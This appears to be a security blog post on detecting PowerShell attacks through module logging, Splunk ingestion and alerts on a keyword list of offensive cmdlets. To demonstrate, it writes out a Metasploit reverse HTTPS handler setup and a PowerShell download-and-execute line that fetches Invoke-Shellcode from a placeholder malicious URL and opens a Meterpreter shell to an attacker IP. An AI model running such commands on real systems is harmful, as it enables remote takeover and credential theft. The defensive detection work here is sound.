For the past little while I have been spending time learning about PowerShell and how it can be used as a subtle threat vector inside your network. A number of PowerShell exploitation frameworks have popped up recently, including PowerSploit and Empire, which Greg covered at length back in September. I, however, wanted to spend some time demonstrating how subtle and insidious PowerShell can be when used as a threat medium.
As mentioned in an earlier post, according to Verizon's 2013 Data Breach Report 76% of breaches involved stolen or weak credentials, so, to start, this post will assume that you have already been exploited and the attacker potentially has admin or domain admin credentials, in order to focus on PowerShell as a threat vector.
A huge thank you to Ryan Kazanciyan and Matt Hastings for their research on PowerShell attacks, which was the starting point and main resource for research on this topic.
The Windows PowerShell section will list the Turn on Module Logging setting:
Select Enabled and click the Module Names: Show button:
From there add the lines "Microsoft.PowerShell.*" and "Microsoft.WSMan.Management":
It worked! We can see the commands that were executed. It worked... too well. We see approximately 300 events, one event for each command executed in the Invoke-Shellcode script. Well, this is quite troubling. You are going to need a SIEM to process this type of volume, and we will use Splunk for this scenario.
Downloading and Connecting to Metasploit
Once an actor gains access to a random Windows server inside your environment, the first action they will typically perform is to escalate privileges. PowerSploit has a neat PowerShell module called Invoke-ShellCode that can invoke shellcode into a running process or even PowerShell itself. So, for example, you can set up a Kali Linux server with a Metasploit handler listening on port 443 for incoming shellcode connections:
Metasploit:
msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_https
msf exploit(handler) > set LHOST <Your local host>
msf exploit(handler) > set LPORT 443
msf exploit(handler) > exploit
Then you can run the following commands to download and run the PowerShell Invoke-Shellcode script (by default the file is named Invoke--Shellcode in the Git repositories. That was a wasted day and a half.) This will create an HTTPS connection back to a C&C Meterpreter shell, or worse:
PowerShell:
IEX (New-Object Net.WebClient).DownloadString("https://<Malicious URL>/Invoke-Shellcode.ps1")
Invoke-ShellCode -Payload windows/meterpreter/reverse_https -Lhost <malicious IP> -Lport 443 -Force
Event Logging
Because both the download and the ShellCode connections are over HTTPS, most perimeter IPS/antivirus will not inspect them. The ShellCode runs in memory and never touches the disk, making it very hard to detect by both antivirus and classic forensics, but the important thing to focus on here is how PowerShell logs these events while hunting. Executing the above on a Windows 2008 R2 OS with PowerShell 2.0 generates only three relevant events in the Windows PowerShell event log:
The Windows PowerShell Event Log After Executing ShellCode in PowerShell
Leaving basically three events to go by:
Event ID | Message
--- | ---
400 | Engine state is changed from None to Available.
403 | Engine state is changed from Available to Stopped.
600 | Provider "Certificate" is Started.
Source: WinEventLog:Windows PowerShell
There is nothing in the event logs about running a script that invokes a ShellCode backdoor to my malicious C&C domain. Can you believe Windows Event Logs? Ridiculous. But security-wise this is a serious concern, since there is no indication of what commands or scripts were run, by whom, or what actions the system took. Running similar scripts such as Invoke-Mimikatz also produces roughly the same events from within a PowerShell context. This is a well-known limitation in PowerShell 2.0; however, the challenge is that most environments run operating systems that have PowerShell 2.0 installed by default, leaving organizations that don't use PowerShell with little reason to upgrade. This also leaves an active hole in an organization's security posture towards potential threat vectors. You can't understand what is happening if your system won't tell you.
PowerShell 3.0 comes with many improvements, including improved logging, so running the above command on a machine with PowerShell 3.0 will give you the same three events in Windows PowerShell, but it will also give you a number of new events in both Windows-PowerShell/Operational and Windows-WinRM/Operational.
Event ID | Message
--- | ---
403 | PowerShell Console Startup
40961 | Engine state is changed from None to Available.
40962 | PowerShell console is ready for user input
Source: Microsoft-Windows-PowerShell/Operational
Event ID | Message
--- | ---
208 | The Winrm service is starting
209 | The Winrm service started successfully
211 | The Winrm service is stopping
212 | The Winrm service was stopped successfully
Source: Microsoft-Windows-WinRM/Operational
This is better: we are able to see that the PowerShell console was manually started and that the WinRM service was used in some capacity; but there is no record of what scripts or commands were run or what the results of those commands were. On a side note, while running Invoke-ShellCode I mistyped the URL and received event 4100 with the error message "No connection could be made because the target machine actively refused." More on that later, but for now the overall lack of usable events is frightening and cannot stand.
PowerShell Module Logging
One option is to add logging options to the global PowerShell profile; however, profiles can be easily bypassed by adding the "-NoProfile" flag to your commands. The best option, however, is to enable PowerShell Module Logging in your GPO [Edit: PowerShell 3.0+ is required on the system.] To do so, go to your Group Policy Editor -> Computer Configuration -> Policies -> Administrative Templates -> Windows Components -> Windows PowerShell:
GPO Windows PowerShell Module Logging Location
Windows PowerShell Module Logging Modules
Windows PowerShell Module Logging Properties
Module Logging for PowerShell and WSMan
Now, let's try the remote shellcode connection again:
Windows Event Log with Module Logging
Setting up Splunk for PowerShell Events
To input PowerShell events into Splunk, create an inputs.conf with the following stanza:
[WinEventLog://Windows PowerShell]
disabled = false
index = wineventlog
This stanza will read events from the Windows PowerShell event log, which is where the PowerShell commands are saved. Additional Windows event logs that you can collect for a good posture are the PowerShell Operational, PowerShell Analytic and WinRM Operational event logs. Use the following stanza for each:
[WinEventLog://Microsoft-Windows-PowerShell/Operational]
disabled = false
index = wineventlog
[WinEventLog://Microsoft-Windows-PowerShell/Analytic]
disabled = false
index = wineventlog
[WinEventLog://Microsoft-Windows-WinRM/Operational]
disabled = false
index = wineventlog
So now that we have our events in Splunk, we need a way to search for malicious events. First, what is a malicious event in PowerShell? I like to look for keywords used in gfoss' PowerShell Command Line Logging list:
- Set-ExecutionPolicy
- Mimikatz
- EncodedCommand
- Payload
- Find-AVSignature
- DllInjection
- ReflectivePEInjection
- Invoke-Shellcode
- Invoke--Shellcode
- Invoke-ShellcodeMSIL
- Get-GPPPassword
- Get-Keystrokes
- Get-TimedScreenshot
- Get-VaultCredential
- Invoke-CredentialInjection
- Invoke-NinjaCopy
- Invoke-TokenManipulation
- Out-Minidump
- Set-MasterBootRecord
- New-ElevatedPersistenceOption
- Invoke-CallbackIEX
- Invoke-PSInject
- Invoke-DllEncode
- Get-ServiceUnquoted
- Get-ServiceEXEPerms
- Get-ServicePerms
- Invoke-ServiceUserAdd
- Invoke-ServiceCMD
- Write-UserAddServiceBinary
- Write-CMDServiceBinary
- Write-UserAddMSI
- Write-ServiceEXE
- Write-ServiceEXECMD
- Restore-ServiceEXE
- Invoke-ServiceStart
- Invoke-ServiceStop
- Invoke-ServiceEnable
- Invoke-ServiceDisable
- Invoke-FindDLLHijack
- Invoke-FindPathHijack
- Get-RegAlwaysInstallElevated
- Get-RegAutoLogon
- Get-UnattendedInstallFiles
- Get-Webconfig
- Get-ApplicationHost
- Invoke-AllChecks
- Invoke-MassCommand
- Invoke-MassMimikatz
- Invoke-MassSearch
- Invoke-MassTemplate
- Invoke-MassTokens
- HTTP-Backdoor
- Add-ScrnSaveBackdoor
- Gupt-Backdoor
- Invoke-ADSBackdoor
- Execute-OnTime
- DNS_TXT_Pwnage
- Out-Word
- Out-Excel
- Out-Java
- Out-Shortcut
- Out-CHM
- Out-HTA
- Enable-DuplicateToken
- Remove-Update
- Execute-DNSTXT-Code
- Download-Execute-PS
- Execute-Command-MSSQL
- Download_Execute
- Get-PassHashes
- Invoke-CredentialsPhish
- Get-LsaSecret
- Get-Information
- Invoke-MimikatzWDigestDowngrade
- Copy-VSS
- Check-VM
- Invoke-NetworkRelay
- Create-MultipleSessions
- Run-EXEonRemote
- Invoke-BruteForce
- Port-Scan
- Invoke-PowerShellIcmp
- Invoke-PowerShellUdp
- Invoke-PsGcatAgent
- Invoke-PoshRatHttps
- Invoke-PowerShellTcp
- Invoke-PoshRatHttp
- Invoke-PowerShellWmi
- Invoke-PSGcat
- Remove-PoshRat
- TexttoEXE
- Invoke-Encode
- Invoke-Decode
- Base64ToString
- StringtoBase64
- Do-Exfiltration
- Parse_Keys
- Add-Exfiltration
- Add-Persistence
- Remove-Persistence
- Invoke-CreateCertificate
- powercat
- Find-PSServiceAccounts
- Get-PSADForestKRBTGTInfo
- Discover-PSMSSQLServers
- Discover-PSMSExchangeServers
- Get-PSADForestInfo
- Get-KerberosPolicy
- Discover-PSInterestingServices
index=wineventlog sourcetype="WinEventLog:Windows PowerShell" [|inputlookup BadPowerShellCommands.csv | rename BadPowerShellCommand as search | format]
This will filter your PowerShell event set down to anything containing a malicious command. Next, in the search page, click the Save As button and save as Alert:
Splunk Search with Save option for creating an Alert
This opens the Alert Creation window:
Alert creation screen
Depending on your environment you may need to play with the scenarios that you alert on; for example, if your administrators are heavy PowerShell users you may want to whitelist your administrators except during off hours/non-change window periods. I would also monitor for the command "Enable-PSRemoting", since this command enables the ability to remotely execute PowerShell commands on a local machine. Only administrators with a need should enable this feature.
Finally, if your environment doesn't use PowerShell, you can look for interactive PowerShell commands (or maybe just during off hours/non-change windows) such as "Invoke-Command" and "Enter-PSSession".